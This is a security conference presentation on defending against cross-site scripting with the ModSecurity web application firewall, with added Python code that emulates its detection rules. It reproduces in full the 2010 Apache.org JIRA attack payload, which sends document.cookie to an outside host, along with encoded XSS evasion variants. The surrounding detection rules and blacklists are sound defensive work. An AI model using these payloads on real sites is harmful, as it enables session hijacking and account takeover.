Ryan Barnett - Background

Trustwave
* Member of the SpiderLabs Research Team
* Senior Security Researcher
  - Web application firewall research/development
  - Virtual patching for web applications
* ModSecurity Community Manager
  - Interface with the community on public mail-list
  - Steer the internal development of ModSecurity

Author
* "Preventing Web Attacks with Apache"
Ryan Barnett - Community Projects

Open Web Application Security Project (OWASP)
* Speaker/Instructor
* Project Leader, ModSecurity Core Rule Set
* Project Contributor, OWASP Top 10
* Project Contributor, AppSensor

Web Application Security Consortium (WASC)
* Board Member
* Project Leader, Web Hacking Incident Database
* Project Leader, Distributed Web Honeypots
* Project Contributor, Web Application Firewall Evaluation Criteria
* Project Contributor, Threat Classification

The SANS Institute
* Courseware Developer/Instructor
* Project Contributor, CWE/SANS Top 25 Worst Programming Errors
Session Outline

* XSS Intro
  - What is it?
  - Real-world compromise of Apache.org
* XSS Remediation
  - Strategic vs. Tactical
  - When you can't fix the code
* XSS Street-Fight
  - Input Validation
    - Whitelist Filtering
    - Blacklist Filtering
    - Generic Attack Payload Detection
  - Identify Output Handling Flaws
    - Missing output escaping of user-supplied content
  - Application Response Profiling
    - Track the # of scripts/iframes in pages
  - Defensive JS Injection
    - JS Sandbox
* Conclusion/Questions
XSS Introduction

Background
Cross-Site Scripting (XSS)

Attack: XSS
* Attacker can send data through web applications that will execute code within the victim's web browser
* It is an interpreter attack against the web browser

Application Defects: Improper Output Handling
* Application does not properly apply contextual output encoding/escaping of user supplied data

Types:
* Reflected, Stored and DOM

Consequences:
* Session Hijacking, Malware Installation, Fraud (CSRF)

Remediation: Contextual Output Encoding
* Must escape differently depending where data is displayed on the page
  - HTML, HTML Attribute, URL, JavaScript, CSS

Reference: OWASP XSS Cheatsheet
* http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
WASC Web Hacking Incident Database (WHID)

* Entry Title: WHID 2010-67: Apache.org hit by targeted XSS attack, passwords compromised
* WHID ID: 2010-67
* Date Occurred: April 9, 2010
* Attack Method: Cross Site Scripting (XSS), Brute Force
* Application Weakness: Improper Output Handling
* Outcome: Session Hijacking
* Reference: http://blogs.zdnet.com/security/?p=6123&tag=nl.e539

http://projects.webappsec.org/Web-Hacking-Incident-Database
Attackers opened a new issue in JIRA
* INFRA-2591

Issue contained the following text:

  ive got this error while browsing some projects in jira
  http://tinyurl.com/XXXXXXXXX [obscured]

Some administrators clicked the evil link
* Crafted to exploit a previously undisclosed reflected XSS vulnerability
* XSS used to conduct session hijacking attack
TinyURL Redirect

HTTP/1.1 302 Found
Location: https%3A%2F%2Fissues.apache.org%2Fjira%2Fsecure%2Fpopups%2Fcolorpicker.jsp%3Felement%3Dname%3B%7Dcatch%28e%29%7B%7D%250D%250A--%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cmeta%20http-equiv%3D%22refresh%22+content%3D%220%3Burl%3Dhttp%3A%2F%2Fpastie.org%2F904699%22%3E%3C%2Fnoscript%3E%3Cscript%3Edocument.write%28%27%253Cimg%20src%3D%22http%3A%2F%2Fteap.zzl.org%2Fteap.php%3Fdata%3D%27%252bdocument.cookie%252b%27%22%2F%3E%27%29%3Bwindow.location%3D%22http%3A%2F%2Fpastie.org%2F904699%22%3B%3C%2Fscript%3E%3Cscript%3E%3C%21--%26defaultColor%3D%27%3Btry%7B%2F%2F
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Wed, 01 Dec 2010 17:33:52 GMT
Server: TinyURL/1.6
Reflected XSS Request

https://issues.apache.org/jira/secure/popups/colorpicker.jsp?element=name;}catch(e){}%0D%0A--></script><noscript><meta%20http-equiv="refresh"%20content="0;url=http://pastie.org/904699"></noscript><script>document.write('<img%20src="http://teap.zzl.org/teap.php?data='%2bdocument.cookie%2b'"/>');window.location="http://pastie.org/904699";</script><script><!--&defaultColor=';try{//
Reflected XSS in Page

<script language="JavaScript" type="text/javascript">
<!--
var defaultColor = '';try{//';
var choice = false;
var openerForm = opener.document.jiraform;
var openerEl = opener.document.jiraform.name; }catch(e) {}
--></script><noscript><meta equiv="refresh" content="0;url=http://pastie.org/904699"></noscript><script>document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'" />');window.location="http://pastie.org/904699";</script><script><!--;
function colorIn(color) {
  if (!choice) {
    openerEl.value = color;
Display a remote page

(Same page source as the previous slide, with the remote-page fragment highlighted:)
<noscript><meta equiv="refresh" content="0;url=http://pastie.org/904699"></noscript>
...window.location="http://pastie.org/904699";
java.lang.NumberFormatException: For input string:

Stack Trace:

java.lang.NumberFormatException: For input string:
    at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
    at java.lang.Long.parseLong(Long.java:410)
    at java.lang.Long.<init>(Long.java:678)
    at com.atlassian.jira.util.ParameterUtils.getLongListFromStringArray(ParameterUtils.java:561)
    at com.atlassian.jira.issue.transport.impl.IssueNavigatorActionParams.getSearchContext(IssueNavigatorActionParams.java:57)
    at com.atlassian.jira.web.action.issue.SearchDescriptionEnabledAction.getSearchContext(SearchDescriptionEnabledAction.java:109)
    at com.atlassian.jira.web.action.issue.IssueNavigator.populateAndValidate(IssueNavigator.java:248)
    at com.atlassian.jira.web.action.issue.IssueNavigator.doExecute(IssueNavigator.java:135)
    at webwork.action.ActionSupport.execute(ActionSupport.java:153)
    at com.atlassian.jira.action.JiraActionSupport.execute(JiraActionSupport.java:54)
    at webwork.dispatcher.GenericDispatcher.executeAction(GenericDispatcher.java:132)
    at com.atlassian.jira.web.dispatcher.JiraServletDispatcher.service(JiraServletDispatcher.java:178)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.atlassian.core.filters.HeaderSanitisingFilter.doFilter(HeaderSanitisingFilter.java:44)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.atlassian.jira.web.filters.AccessLogFilter.doFilter(AccessLogFilter.java:73)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:119)
    at com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:55)
    at com.atlassian.jira.web.filters.SitemeshExcludePathFilter.doFilter(SitemeshExcludePathFilter.java:38)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:204)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.atlassian.seraph.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:129)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
    at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:138)
Grab the document.cookie

(Same page source as the previous slides, with the cookie-stealing fragment highlighted:)
<script>document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'" />');
Cookie Stealing Request

GET /teap.php?data=JSESSIONID=2FA3A31B6D58E282D40DE3ED6814BCC3;ASESSIONID=19cvqfx-2FA3A31B6D58E282D40DE3ED6814BCC3 HTTP/1.1
Host: teap.zzl.org
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://issues.apache.org/jira/secure/popups/colorpicker.jsp
XSS Remediation

Strategic vs. Tactical

Both Strategic & Tactical remediation efforts should be used to combat XSS flaws.

Strategic Initiatives
* Ownership is application developers
* Focus on root-causes of vulnerabilities for web applications that must be fixed within the application code itself
* Ideal for applications that are in the Design phase of the SDLC
* Keep in mind that this takes TIME

Tactical Responses
* Ownership is operations security staff
* Focus on web applications that are already in production and exposed to attacks
* Examples include using a WAF for virtual patching
* Aim to minimize the Time-to-Fix exposures
Can I fix the code?

[Figure: x-axis "Access to application" (Full / Partial / Little) against a y-axis running Low / Average / High (label not legible). Three cases are plotted: full access to source and developers; mostly developed in-house, low percentage bought in; application as blackbox (high percentage bought, high percentage modified, no product source code).]

Image - OWASP Best Practices: Use of Web Application Firewalls
ModSecurity

It is an open source web application firewall (WAF) module for Apache web servers
* www.modsecurity.org

Separate Rule and Audit Engines
* Allows full request/response HTTP logging capability

Deep understanding of HTTP and HTML
* Robust Parsing (form encoding, multipart, XML)

Event-based Rules Language
* Anti-Evasion Features (normalization functions)

Advanced Capabilities
* Transactional and Persistent Collections
* Content Injection
* Lua API
Example Rule Syntax

SecRule TARGETS OPERATOR [TRANSFORMATIONS, ACTIONS]

* TARGETS: tells ModSecurity where to look
* OPERATOR: tells ModSecurity how to process data
* TRANSFORMATIONS: tells ModSecurity how to normalize data before the operator is applied
* ACTIONS: tells ModSecurity what to do if a rule matches
ModSecurity Demo Page

Results (txn: vwicRn8AAQEAAAkYmzgAAAAC)

CRS Anomaly Score Exceeded (score 137): IE XSS Filters - Attack Detected

All Matched Rules Shown Below

9000033 Detects obfuscated script tags and XML wrapped HTML
Matched <scri at TX:ARGS:test_normalized

9000017 Detects JavaScript object properties and methods
Matched (document. at TX:ARGS:test_normalized

9000023 Detects JavaScript location/document property access and window access obfuscation
Matched (document.cookie)</script><script>alert( at TX:ARGS:test_normalized

9000038 Detects possibly malicious html elements including some attributes
Matched <script at TX:ARGS:test_normalized

958001 Cross-site Scripting (XSS) Attack
Matched document.cookie at ARGS:test

958052 Cross-site Scripting (XSS) Attack
Matched alert( at ARGS:test

http://www.modsecurity.org/demo/crs-demo.html
Demo Page Stats

* Online for all of 2010
* Received >18,700 requests
  - Mainly XSS and SQL Injection attacks
* Attack was considered successful if it did not trigger any ModSecurity alerts
* Automated process would identify evasions
  - SpiderLabs would develop/deploy detection updates
* Let the battle begin!
WAF Defensive Strategy #1: Input Validation

Whitelist/Blacklist Filtering

Input Validation/Filtering Approaches

Whitelist Filtering: deny all, allow what's right
* Enforce expected input for parameter data

Blacklist Filtering: allow all, deny what's wrong
* Blacklist known bad characters or payloads
Whitelisting Rule Example

* In a virtual patching scenario, it is possible to create rules that allow only specific characters

SecRule REQUEST_FILENAME "@streq /jira/secure/popups/colorpicker.jsp" "chain,phase:2,block,capture,t:none"
  SecRule ARGS:element "!^\w+$"

Only allow word characters: a-zA-Z0-9

* Limitations
  - This is a reactive strategy that is applied only to specific locations
  - What about free-form text fields or applications that must allow html?
Targeted Blacklist of Meta-Characters

In a virtual patching scenario, it is also possible to create rules that block the presence of specific meta-characters that are often used in XSS attacks

SecRule REQUEST_FILENAME "@streq /jira/secure/popups/colorpicker.jsp" "chain,phase:2,block,capture,t:none"
  SecRule ARGS:element "@pm < > ( ) \" ' ;"

@pm: fast, set-based pattern match (Aho-Corasick)

* Limitations
  - This is a reactive strategy that is applied only to specific locations
  - The blacklist may not be comprehensive
  - What about parameters that must allow some of these characters?
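The two virtual-patch rule chains above (the whitelist `!^\w+$` check and the `@pm` meta-character blacklist on `ARGS:element`) can be exercised outside ModSecurity. The following is an added example written for this page, not ModSecurity or CRS code: it parses the query string the way the engine populates ARGS, applies both checks to the `element` parameter of `colorpicker.jsp`, and reports what each chain would do. The test URLs are constructed here; the attack URL is a truncated form of the reflected-XSS request shown on the Apache.org slides, and `[A-Za-z0-9_]` is assumed as the meaning of the slide's `\w`.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Added example: emulates the two chained virtual-patch rules from the slides
# (whitelist "!^\w+$" and blacklist "@pm < > ( ) \" ' ;") on the
# colorpicker.jsp 'element' parameter. Not ModSecurity code; the query parsing
# is a minimal stand-in for the engine's ARGS collection.

PATCHED_PATH = "/jira/secure/popups/colorpicker.jsp"
WORD_ONLY = re.compile(r"^[A-Za-z0-9_]+$")      # slide: "only allow word characters"
META_CHARS = frozenset('<>()"\';')              # the @pm phrase list from the slide


def parse_args(query):
    """Split a query string into name -> [values], URL-decoding both sides
    (ModSecurity decodes before populating ARGS as well)."""
    args = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        args.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return args


def check_colorpicker_request(url):
    """Return the verdict of both rule chains for one request URL.

    whitelist_block: ARGS:element fails !^\w+$          (chain 1)
    blacklist_block: ARGS:element contains a listed char (chain 2)
    hits:            which listed meta-characters were present, sorted
    """
    parts = urlsplit(url)
    verdict = {"applies": parts.path == PATCHED_PATH,
               "whitelist_block": False, "blacklist_block": False, "hits": ""}
    if not verdict["applies"]:
        return verdict          # REQUEST_FILENAME did not match: the chains never run
    for value in parse_args(parts.query).get("element", []):
        if not WORD_ONLY.match(value):
            verdict["whitelist_block"] = True
        found = META_CHARS.intersection(value)
        if found:
            verdict["blacklist_block"] = True
            verdict["hits"] = "".join(sorted(set(verdict["hits"]) | found))
    return verdict


# Constructed inputs: a normal colorpicker call, a truncated form of the
# reflected-XSS payload from the Apache.org slides, a legitimate value that a
# blacklist wrongly rejects, and a request to a path the patch does not cover.
NORMAL = "https://issues.apache.org/jira/secure/popups/colorpicker.jsp?element=name&defaultColor="
ATTACK = ("https://issues.apache.org/jira/secure/popups/colorpicker.jsp"
          "?element=name;}catch(e){}%0D%0A--%3E%3C/script%3E&defaultColor=';try{//")
APOSTROPHE = "https://issues.apache.org/jira/secure/popups/colorpicker.jsp?element=O'Brien"
OTHER_PAGE = "https://issues.apache.org/jira/browse/INFRA-2591?element=<b>"

if __name__ == "__main__":
    for url in (NORMAL, ATTACK, APOSTROPHE, OTHER_PAGE):
        print(check_colorpicker_request(url))
```

The `O'Brien` case is the limitation the slide names: a whitelist of word characters and a blacklist containing `'` both reject a value that a free-text field must accept, so either patch has to be scoped to parameters whose legitimate content really is word-only.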
Limitations of Blacklist Filtering

Blacklist Filtering
Attack Payload Detection

Category:OWASP ModSecurity Core Rule Set Project

Overview

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extremely flexible and robust and has been referred to as the "Swiss Army Knife of web application firewalls." While this is certainly true, it doesn't do much implicitly on its own and requires rules to tell it what to do. In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Unlike intrusion detection and prevention systems, which rely on signatures specific to known vulnerabilities, the CRS is based on generic rules which focus on attack payload identification in order to provide protection from zero day and unknown vulnerabilities often found in web applications, which are in most cases custom coded.

Detection Categories

In order to provide generic web applications protection, the Core Rules use the following techniques:

* Protocol compliance:
  - HTTP request validation - This first line of protection ensures that all abnormal HTTP requests are detected. This line of defense eliminates a large number of automated and non targeted attacks as well as protects the web server itself.

http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
Example XSS Attack Payload Resources

* RSnake's XSS Cheatsheet
  - http://ha.ckers.org/xss.html
* HTML5 Security Cheatsheet
  - http://html5sec.org/
* WASC Script Mapping Project
  - http://projects.webappsec.org/Script-Mapping
* FuzzDB
  - http://code.google.com/p/fuzzdb/
* PHPIDS Test Payloads
  - https://trac.php-ids.org/index.fcgi/browser/trunk/tests/IDS/MonitorTest.php
* Microsoft's IE8 XSS Filters
  - http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
Example XSS Attack Payload Rule

* Looking for HTML Event Handlers

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bon(abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mousedown|mousemove|mouseout|mouseover|mouseup|move|readystatechange|reset|resize|select|submit|unload)\b\W*?=" "phase:2,rev:'2.1.1',id:'973303',capture,t:none,t:lowercase,pass,nolog,auditlog,msg:'XSS Attack Detected',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"
Encoding Examples

* Original form
<script>alert('XSS')</script>

* HTML Entity Encoding
&lt;script&gt;alert(&apos;XSS&apos;)&lt;/script&gt;

* Hex Entity Encoding
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;

* Half-Width/Full-Width Unicode Encoding
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff38\uff33\uff33\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
ModSecurity's Transformation Functions

* ModSecurity includes a number of transformation functions which will normalize data prior to applying operators
  - urlDecodeUni
  - htmlEntityDecode
  - jsDecode
  - cssDecode

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "(fromcharcode|alert|eval)\s*\(" "phase:2,rev:'2.1.1',id:'973307',capture,t:none,t:htmlEntityDecode,t:jsDecode,t:lowercase,pass,nolog,auditlog,msg:'XSS Attack Detected',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"
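To see why the transformation chain matters, the following added example (written for this page, not ModSecurity code) runs the operator of the rule above over the four encodings from the "Encoding Examples" slide, once with only lowercasing and once after a decode chain in the spirit of `t:htmlEntityDecode`, `t:jsDecode` and `t:lowercase`. The full-width folding step (Unicode NFKC) is an addition to cover the half-/full-width example and is not one of the ModSecurity transformation functions; the sample strings are constructed from the slide's payload.

```python
import html
import re
import unicodedata

# Added example, not ModSecurity code: a normalization pipeline modelled on
# t:htmlEntityDecode + t:jsDecode + t:lowercase, followed by the operator of
# CRS rule 973307 as shown on the slide. NFKC width folding is an extra step
# (not a ModSecurity transformation) added for the full-width example.

JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
JS_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
XSS_CALL = re.compile(r"(fromcharcode|alert|eval)\s*\(")   # operator of rule 973307


def html_entity_decode(value):
    """Named (&lt; &apos;), decimal (&#60;) and hex (&#x3c;) entities -> characters."""
    return html.unescape(value)


def js_decode(value):
    """\\uXXXX and \\xXX JavaScript escapes -> characters."""
    value = JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)


def fold_width(value):
    """Map full-width forms such as U+FF1C onto their ASCII equivalents."""
    return unicodedata.normalize("NFKC", value)


def normalize(value):
    return fold_width(js_decode(html_entity_decode(value))).lower()


def detect(value):
    """Return the fragment the operator matched after normalization, or None."""
    m = XSS_CALL.search(normalize(value))
    return m.group(0) if m else None


def detect_raw(value):
    """The same operator with t:lowercase only, to show what encoding evades."""
    m = XSS_CALL.search(value.lower())
    return m.group(0) if m else None


# Constructed variants of the slide's payload, one per encoding on the slide.
ORIGINAL = "<script>alert('XSS')</script>"
NAMED_ENTITIES = "&lt;script&gt;alert(&apos;XSS&apos;)&lt;/script&gt;"
HEX_ENTITIES = "".join("&#x%x;" % ord(c) for c in ORIGINAL)
# printable ASCII 0x21..0x7E maps onto the full-width block U+FF01..U+FF5E
FULL_WIDTH_JS = "".join("\\u%04x" % (ord(c) - 0x20 + 0xFF00) for c in ORIGINAL)

if __name__ == "__main__":
    for sample in (ORIGINAL, NAMED_ENTITIES, HEX_ENTITIES, FULL_WIDTH_JS):
        print("raw:", detect_raw(sample), "normalized:", detect(sample))
```

The raw check still fires on the named-entity form because `alert(` survives that encoding literally; it misses the hex-entity and full-width forms entirely, which is exactly the gap the transformation functions close.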
Nested Encoding Examples

Original form
<script>alert(/XSS/)</script>

Base64 Encoded Fragment #1
<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>

Base64 Encoded Fragment #2 - PHP
<applet src="data:text/html;base64,P.HNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>

Notice the extra dot character?
Lua Port of PHPIDS

http://phpids.net/
* ~70 regular expression rules to detect common attack payloads
  - XSS
  - SQL Injection
  - RFI
* Filters are heavily tested by the community and updated frequently
  - https://svn.php-ids.org/svn/trunk/lib/IDS/Converter.php
  - https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml
* Thanks to Mario Heiderich

Trustwave SpiderLabs worked with PHPIDS lead to port code to Lua for use in ModSecurity's API
* Introduced in OWASP ModSecurity CRS v2.1.0
Example Normalization Functions

# Lua script to normalize input payloads
# Based on PHPIDS Converter.php code
# Reference the following whitepaper -
# http://docs.google.com/Doc?id=dd7x5smw_17g9cnx2cn
#
SecRuleScript ../lua/advanced_filter_converter.lua "phase:2,t:none,pass"

--[[ Make sure the value to normalize and monitor doesn't contain Regex DoS ]]
--[[ Check for comments and erases them if available ]]
--[[ Strip newlines ]]
--[[ Checks for common charcode pattern and decodes them ]]
--[[ Eliminate JS regex modifiers ]]
--[[ Converts from hex/dec entities ]]
--[[ Normalize Quotes ]]
--[[ Converts SQLHEX to plain text ]]
--[[ Converts basic SQL keywords and obfuscations ]]
--[[ Detects nullbytes and controls chars via ord() ]]
--[[ This method matches and translates base64 strings and fragments ]]
--[[ Strip XML patterns ]]
--[[ This method converts JS unicode code points to regular characters ]]
--[[ Converts relevant UTF-7 tags to UTF-8 ]]
--[[ Converts basic concatenations ]]
--[[ This method collects and decodes proprietary encoding types ]]
Debug Log View of Base64 Decoding

[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/sid#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data is: PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4.
[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/sid#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data Decoded is: <script>alert(/XSS/)</script>.
[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/sid#8407588] [rid#b5b88c0] [/demo/phpids] [4] Base64 Data Normalized: <applet src="javascript:text/html;base64,<script>alert(/XSS/)</script>" type=text/html>.
[07/Jan/2011:11:28:24 --0800] [www.modsecurity.org/sid#8407588] [rid#b5b88c0] [/demo/phpids] [9] Set variable "tx.ARGS:test_normalized" to "<applet src=\"javascript:text/html;base64,<script>alert(/XSS/)</script>\" type=text/html>\nappletalert(/XSS/)script\" type=text/html>".
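The "extra dot" on the Nested Encoding slide and the decode shown in the debug log above come down to one property of the decoder: PHP's `base64_decode()` in non-strict mode drops characters outside the base64 alphabet, so a fragment padded with a stray `.` still yields the script, while a decoder that insists on canonical base64 rejects it and a normalizer built on such a decoder never sees the payload. The following is an added example written for this page, not PHPIDS, CRS or ModSecurity code; it contrasts strict and lenient decoding on the two fragments from the slide and rewrites a `data:` URI body the way the "Base64 Data Normalized" log line does. The fragments are the slide's; the `data:` URI regex is this example's own.

```python
import base64
import binascii
import re

# Added example, not ModSecurity/PHPIDS code: strict vs lenient base64 handling
# of the fragments on the 'Nested Encoding Examples' slide, and the data: URI
# rewrite that the 'Base64 Data Normalized' debug-log line shows.

NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")
DATA_URI_B64 = re.compile(r"(data:[^,\"']*;base64,)([^\"'\s>]+)", re.IGNORECASE)


def strict_decodes(fragment):
    """True only if the fragment is canonical base64 (alphabet and padding)."""
    try:
        base64.b64decode(fragment, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def lenient_b64decode(fragment):
    """Drop non-alphabet characters and repair the padding, as PHP's
    non-strict base64_decode() effectively does, then decode."""
    cleaned = NOT_B64.sub("", fragment)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-8", "replace")


def normalize_data_uris(value):
    """Replace every base64 data: URI body with its decoded text so that the
    later regex filters see the embedded markup instead of base64."""
    return DATA_URI_B64.sub(lambda m: m.group(1) + lenient_b64decode(m.group(2)), value)


# Fragments as they appear on the slide (the second carries the stray dot).
FRAGMENT_1 = "PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4"
FRAGMENT_2 = "P.HNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4"
APPLET_2 = '<applet src="data:text/html;base64,%s" type=text/html>' % FRAGMENT_2

if __name__ == "__main__":
    print("strict:", strict_decodes(FRAGMENT_1), strict_decodes(FRAGMENT_2))
    print("lenient:", lenient_b64decode(FRAGMENT_2))
    print(normalize_data_uris(APPLET_2))
```

Both fragments fail the strict decoder (the first only because the slide omits the trailing `=`), which is the practical point: a WAF normalizer has to be at least as forgiving as the decoder on the receiving side, or the encoding becomes an evasion.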
Converted PHPIDS Filters

<filter>
  <id>1</id>
  <rule><![CDATA[(?:"[^"]*[^-]?>)|(?:[^\w\s]\s*\/>)|(?:>")]]></rule>
  <description>finds html breaking injections including whitespace attacks</description>
  <tags>
    <tag>xss</tag>
    <tag>csrf</tag>
  </tags>
  <impact>4</impact>
</filter>

SecRule TX:'/^(QUERY|REQUEST|ARGS:).*_normalized/' "(?:\"[^\"]*[^-]?>)|(?:[^\w\s]\s*\/>)|(?:>\")" "phase:2,capture,t:none,t:lowercase,pass,skip:1,nolog,auditlog,msg:'finds html breaking injections including whitespace attacks',id:'900001',tag:'WEB_ATTACK/XSS',tag:'WEB_ATTACK/CSRF',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.id}-%{rule.msg}',setvar:tx.anomaly_score=+4,setvar:'tx.%{tx.msg}-WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}',setvar:'tx.%{tx.msg}-WEB_ATTACK/CSRF-%{matched_var_name}=%{tx.0}'"

WAF Defensive Strategy #2:
Generic Attack Payload Detection

Need to ensure that the WAF, web application and browser all normalize and interpret data in the same way

Not as easy as you might think

[Figure: WAF, web application and browser, each interpreting the same data]

Issues
* Browser Quirks
* RFC Implementation Differences
* Encodings
* JavaScript Comments
* Non-alphanumeric JavaScript
* Best-Fit Mappings

Blacklist filtering approach to combat XSS is doomed to fail...
* Endless methods of achieving functionally equivalent code
Non-Alphanumeric JavaScript

* Care to guess what this code does?

  [non-alphanumeric JavaScript snippet; not legible in the source]

* Or this:

  [second non-alphanumeric JavaScript snippet; not legible in the source]

* If either of these code snippets falls within JavaScript inside the DOM, then it will execute an alert(1) pop-up
Generic Attack Payload Detection

* Obfuscation methods often have certain characteristics
* OWASP ModSecurity Core Rule Set
  - Amount of different meta-characters
  - Repetitive use of non-word characters
* PHPIDS Centrifuge Concepts
  - Ratio
    - count of word characters, spaces, punctuation vs. non-word characters
    - Ratio of < 3.49 = Malicious
  - Normalization/Stripping
    - Remove or convert any word character and spaces including line breaks, tabs and carriage returns
    - Regex check in the default_filters.xml matches malicious result
Restricted Character Usage

SecRule ARGS "@pm < ^ ! @ # $ % ^ & * ( ) - + = { } [ ] | : >" "phase:2,t:none,nolog,pass,setvar:tx.restricted_char_payload=%{matched_var}"

SecRule TX:RESTRICTED_CHAR_PAYLOAD "@contains -" "phase:2,t:none,pass,nolog,setvar:tx.restricted_char_count=+1"

SecRule TX:RESTRICTED_CHAR_PAYLOAD "@contains `" "phase:2,t:none,pass,nolog,setvar:tx.restricted_char_count=+1"

SecRule TX:RESTRICTED_CHAR_PAYLOAD "@contains !" "phase:2,t:none,pass,nolog,setvar:tx.restricted_char_count=+1"

==CUT== (one @contains rule per restricted character)

SecRule TX:RESTRICTED_CHAR_COUNT "@ge 5" "phase:2,t:none,nolog,auditlog,pass,id:'960023',msg:'Restricted Character Anomaly Detection Alert - Total # of special characters exceeded',logdata:'%{tx.restricted_char_payload}'"

Repeated Non-Word Characters

SecRule ARGS "\W{4,}" "phase:2,t:none,pass,nolog,auditlog,id:'960024',msg:'Restricted Character Anomaly Detection Alert - Repetative Non-Word Characters',logdata:'%{matched_var}'"
ModSecurity CRS Demo Example

All Matched Rules Shown Below

Centrifuge Threshold Alert - Ratio Value is: %{tx.0}
Matched 2.15625 at TX:ARGS:test_centrifuge_ratio

960023 Restricted Character Anomaly Detection Alert - Total # of special characters exceeded
Matched = at TX:restricted_char_count

960024 Restricted Character Anomaly Detection Alert - Repetative Non-Word Characters
Matched / $ at TX:ARGS:test_normalized

9000045 Detects basic SQL authentication bypass attempts 2/3
Matched ":xx $x at TX:ARGS:test_normalized

9000067 Detects unknown attack vectors based on PHPIDS Centrifuge detection
Matched ((++:: at TX:ARGS:test_centrifuge_converted
Debug Log View of Centrifuge Ratio

Starting Centrifuge..
Arg Name = ARGS:test and Arg Value = x=/x/ ... [value only partly legible in the source]
Strip Padding1 - name is: ARGS:test and value is: x=/x/ $x=!!1?\"a... [partly legible]
